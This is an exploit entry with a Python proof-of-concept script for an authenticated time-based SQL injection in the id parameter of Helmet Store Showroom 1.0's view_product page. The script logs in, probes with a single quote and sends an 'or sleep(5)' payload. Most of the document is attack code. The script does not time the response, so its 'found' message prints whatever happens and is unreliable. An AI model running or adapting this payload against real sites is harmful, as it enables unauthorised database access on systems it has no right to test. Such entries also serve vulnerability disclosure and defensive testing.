# Exploit Title: Helmet Store Showroom 1.0 - authenticated SQL Injection # Date: 25-11-2022 # Exploit Author: syad # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: Windows 10 + XAMPP 3.2.4 # CVE ID : N/A # Description # The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection. import requests import sys import pyfiglet sess = requests.Session() proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"} def login1(ip,username,password): x = "http://%s/hss/classes/Login.php?f=login" % ip login = {'username':username, 'password':password} r = sess.post(x, data=login, proxies=proxies) #print(r.content) def login(ip): x = ("http://%s/hss/admin") % ip r = sess.get(x,proxies=proxies) if "Welcome to Helmet Store Showroom - PHP" in r.text: print("--------------------------------------------") print("[+] Success Login") def detect_sql(ip): x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip r = sess.get(x,proxies=proxies) if "You have an error in your SQL syntax" in r.text: print("[+] Found SQL Error") def time_based_sqli(ip): x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip r = sess.get(x,proxies=proxies) print("[+] Time Based SQL Found") print("[*]!!! Time To Report !!!") if __name__ == "__main__": result = pyfiglet.figlet_format("PWN") print(result) try: ip = sys.argv[1].strip() username = sys.argv[2].strip() password = sys.argv[3].strip() except IndexError: print("[-] Usage %s " % sys.argv[0]) print("[-] Example: %s 192.168.1.x" % sys.argv[0]) sys.exit(-1) login1(ip,username,password) login(ip) detect_sql(ip) time_based_sqli(ip)